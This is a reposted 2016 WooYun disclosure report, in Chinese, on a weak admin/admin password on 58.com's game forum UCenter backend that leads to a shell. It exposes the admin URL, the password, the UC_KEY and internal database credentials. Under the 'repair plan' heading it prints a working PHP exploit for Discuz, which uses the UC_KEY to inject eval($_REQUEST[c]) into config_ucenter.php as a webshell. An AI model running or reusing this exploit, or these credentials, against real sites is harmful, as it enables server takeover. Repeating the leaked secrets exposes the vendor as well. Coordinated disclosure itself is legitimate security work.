58 游戏论坛后台弱口令可导致getshell

admin
admin
admin
103513
文章
87
评论
2017年5月4日18:19:42评论417 views字数 230阅读0分46秒阅读模式
摘要

2016-03-11: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-183346

漏洞标题: 58 游戏论坛后台弱口令可导致getshell

相关厂商: 58同城

漏洞作者: H.U.C-人 族

提交时间: 2016-03-11 14:01

公开时间: 2016-04-25 15:10

漏洞类型: 后台弱口令

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 弱口令 admin/admin弱口令 后台地址泄露

2人收藏

漏洞详情

披露状态:

2016-03-11: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

简要描述:

详细说明:

http://bbs.wan.58.com/uc_server/admin.php?sid=279dCl4qLSDlnm5ZAMOUv%2BnSGzYhbr8qMKvYDm1Jnmd32OfGlQRFcKs4gBM7doceOVP6edWh7iunAw

密码 admin

58 游戏论坛后台弱口令可导致getshell

58 游戏论坛后台弱口令可导致getshell

漏洞证明:

ucenter:key

Uet5r701maVbU04eIb49t2f2y021T2c2K3q9Tdi5Q16f35M3w1XeC7Z9n6X353A8

58 游戏论坛后台弱口令可导致getshell

code 区域 
配置信息
 define('UC_CONNECT', 'mysql');
 
 define('UC_DBHOST', '192.168.17.101');
 
 define('UC_DBUSER', '58_bbs');
 
 define('UC_DBPW', 'youxi$217*ceshi&');
 
 define('UC_DBNAME', 'bbs');
 
 define('UC_DBCHARSET', 'utf8');
 
 define('UC_DBTABLEPRE', '`bbs`.prh_ucenter_');
 
 define('UC_DBCONNECT', '0');
 
 define('UC_KEY', 'Uet5r701maVbU04eIb49t2f2y021T2c2K3q9Tdi5Q16f35M3w1XeC7Z9n6X353A8');
 
 define('UC_API', 'http://bbs.wan.58.com/uc_server');
 
 define('UC_CHARSET', 'utf-8');
 
 define('UC_IP', '');
 
 define('UC_APPID', '1');
 
 define('UC_PPP', '20');

修复方案:

code 区域 
Discuz的利用UC_KEY进行getshell
 <?php
 
 
 
 
 
 $key = 'cebbvi5s15BSiMXteaP9TNCIz5K5jAVekw7tcV9TqmYCNT5VOJdu7toOxipTX';#少年 uc_key 写在这里
 
 $url = 'http://localhost/api/uc.php';
 
 $arg = 'action=updateapps&time='.time();#拿webshell:http://localhost/config/config_ucenter.php 密码:c
 
 echo 'curl "'.$url.'?code='.rawurlencode(authcode($arg,'ENCODE',$key)).'" -d "'.addslashes('<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">https://sb/');eval(/$_REQUEST[c]);#</item></root>').'"';
 
 #curl或者用其他工具post提交
 
 
 
 function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
 
  $ckey_length = 4;
 
  $key = md5($key);
 
  $keya = md5(substr($key, 0, 16));
 
  $keyb = md5(substr($key, 16, 16));
 
  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 
 
 
  $cryptkey = $keya.md5($keya.$keyc);
 
  $key_length = strlen($cryptkey);
 
 
 
  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
 
  $string_length = strlen($string);
 
 
 
  $result = '';
 
  $box = range(0, 255);
 
 
 
  $rndkey = array();
 
  for($i = 0; $i <= 255; $i++) {
 
   $rndkey[$i] = ord($cryptkey[$i % $key_length]);
 
  }
 
 
 
  for($j = $i = 0; $i < 256; $i++) {
 
   $j = ($j + $box[$i] + $rndkey[$i]) % 256;
 
   $tmp = $box[$i];
 
   $box[$i] = $box[$j];
 
   $box[$j] = $tmp;
 
  }
 
 
 
  for($a = $j = $i = 0; $i < $string_length; $i++) {
 
   $a = ($a + 1) % 256;
 
   $j = ($j + $box[$a]) % 256;
 
   $tmp = $box[$a];
 
   $box[$a] = $box[$j];
 
   $box[$j] = $tmp;
 
   $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
 
  }
 
 
 
  if($operation == 'DECODE') {
 
   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
 
    return substr($result, 26);
 
   } else {
 
    return '';
 
   }
 
  } else {
 
   return $keyc.str_replace('=', '', base64_encode($result));
 
  }
 
 
 
 }
 
 
 
 ?>

版权声明:转载请注明来源 H.U.C-人 族@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-11 15:10

厂商回复:

已确认,感谢对58安全的关注。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-15 22:51 | 大志哥 ( 路人 | Rank:22 漏洞数:7 | @_@)

    0

    discuz x3.2可以用你这个EXP不?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin